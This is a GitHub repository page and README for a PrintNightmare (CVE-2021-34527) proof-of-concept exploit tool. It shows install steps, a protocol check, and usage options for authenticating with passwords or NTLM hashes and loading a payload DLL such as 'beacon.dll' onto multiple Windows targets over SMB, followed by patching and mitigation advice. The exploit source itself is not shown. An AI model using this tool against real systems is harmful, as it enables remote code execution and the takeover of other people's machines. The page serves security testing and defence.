Skip to content
/ CVE-2021-34527 Public

PrintNightmare (CVE-2021-34527) PoC Exploit

106 stars 21 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

m8sec/CVE-2021-34527

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
.gitignore
.gitignore
 
 
CVE-2021-34527.py
CVE-2021-34527.py
 
 
README.md
README.md
 
 

Repository files navigation

PrintNightmare (CVE-2021-34527)

This version of the PrintNightmare exploit is based on the code created by Cube0x0, with the following features:

  • Ability to target multiple hosts.
  • Built-in SMB server for payload delivery, removing the need for open file shares.
  • Exploit includes both MS-RPRN & MS-PAR protocols (define in CMD args).
  • Implements @gentilkiwi's UNC bypass technique.

Installation

Before running, install the latest version of impacket:

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install

git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h

Test

Impacket's rpcdump.py can be used to check for MS-PAR and MS-RPRN protocols:

>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Alternatively, byt3bl33d3r's scanner ItWasAllADream can be used to scan targets and validate the PrintNightmare RCE vulnerability.

Screenshots

pnm

Usage

  -v VERBOSE            Enable verbose logging from SMB server
  -t TIMEOUT            Connection timeout

Authentication:
  -u USERNAME           Set username
  -H HASH, -hashes      Use NTLM Hash for authentication
  -p PASSWORD           Set password
  -d DOMAIN             Set domain
  --local-auth          Authenticate to target host, no domain

DLL Execution:
  -dll DLL                  Path to local DLL file to execute "beacon.dll"
  --remote-dll REMOTE_DLL   Remote dll "\\192.168.1.25\Share\beacon.dll"
  -share SHARE              Set local SMB share name
  --local-ip LOCAL_IP       Set local IP (defaults to primary interface)

Target(s):
  -pDriverPath PDRIVERPATH  Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
  -port [destination port]  Destination port to connect to SMB Server
  -proto {MS-RPRN,MS-PAR}   Target protocol (Default=MS-RPRN)
  target                    192.168.2.2, target.txt, 10.0.0.0/24 (positional)

Remediation

Microsoft has released several patches for PrintNightmare, the latest being on Patch Tuesday of September 2021. This addressed the underlying vulnerability and later workarounds discovered. For more information, visit Microsoft's official guidance:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

Additional strategies for mitigating this vulnerability include:

  • Disabling the Print Spooler service on non-essential systems.
  • Disable inbound remote printing through Group Policy

Acknowledgement

About

PrintNightmare (CVE-2021-34527) PoC Exploit

Resources

Readme
Activity

Stars

106 stars

Watchers

4 watching

Forks

21 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages